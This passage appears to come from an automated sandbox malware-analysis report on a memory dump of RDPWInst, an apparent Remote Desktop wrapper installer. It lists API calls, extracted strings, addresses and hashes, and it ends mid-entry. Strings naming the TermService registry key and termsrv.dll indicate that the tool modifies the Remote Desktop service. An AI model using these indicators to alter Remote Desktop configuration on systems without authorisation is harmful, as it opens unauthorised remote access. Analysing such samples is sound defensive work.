                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                  • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                                                  • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                                                                                                  • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                                                  • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                                                  • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                                                                                                  • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                                                  • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                                                                  • String ID: GetLongPathNameW$kernel32.dll
                                                                                                                                  • API String ID: 682285877-568771998
                                                                                                                                  • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                                                  • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                                                                                                  • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                                                  • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                                                                  Strings
                                                                                                                                  • $sD, xrefs: 0043CA16
                                                                                                                                  • ServiceDll, xrefs: 0043CA58
                                                                                                                                  • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                                                                  • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                                                                  • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                                                                  • API String ID: 1452528299-1418523706
                                                                                                                                  • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                                                  • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                                                                                                  • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                                                  • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                                                                                                  APIs
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleService
                                                                                                                                  • String ID: error (code $$sD$[-]
                                                                                                                                  • API String ID: 1725840886-1845222458
                                                                                                                                  • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                                                  • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                                                                                                  • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                                                                  • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                                                  • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                                                                                                  • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                                                                  • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                                                                  • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                                                                  • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                                                                  • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3213498283-0
                                                                                                                                  • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                                                  • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                                                                                                  • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                                                                  • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                                                                    • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                                                                  • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                                                                  • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                  • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                                                  • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                                                                                                  • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                                                                  • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                                                                    • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                  • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                                                  • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                                                                                                  • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                                                                  • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocaleThread
                                                                                                                                  • String ID: 0\D$`\D$|\D
                                                                                                                                  • API String ID: 635194068-1443555069
                                                                                                                                  • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                                                  • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                                                                                                  • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                                                  • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocaleThread
                                                                                                                                  • String ID: 0\D$`\D$|\D
                                                                                                                                  • API String ID: 635194068-1443555069
                                                                                                                                  • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                                                  • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                                                                                                  • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                                                  • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                  • String ID: $yyyy
                                                                                                                                  • API String ID: 3303714858-404527807
                                                                                                                                  • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                                                  • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                                                                                                  • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                                                  • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                  • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                                                                  • API String ID: 237503144-3145546840
                                                                                                                                  • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                                                  • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                                                                                                  • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                                                  • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                                                                                                  APIs
                                                                                                                                  • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                                                                  • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                                                                  • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                                                                    • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$ErrorFindLastLoadLock
                                                                                                                                  • String ID: CHARTABLE
                                                                                                                                  • API String ID: 1074440638-2668339182
                                                                                                                                  • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                                                  • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
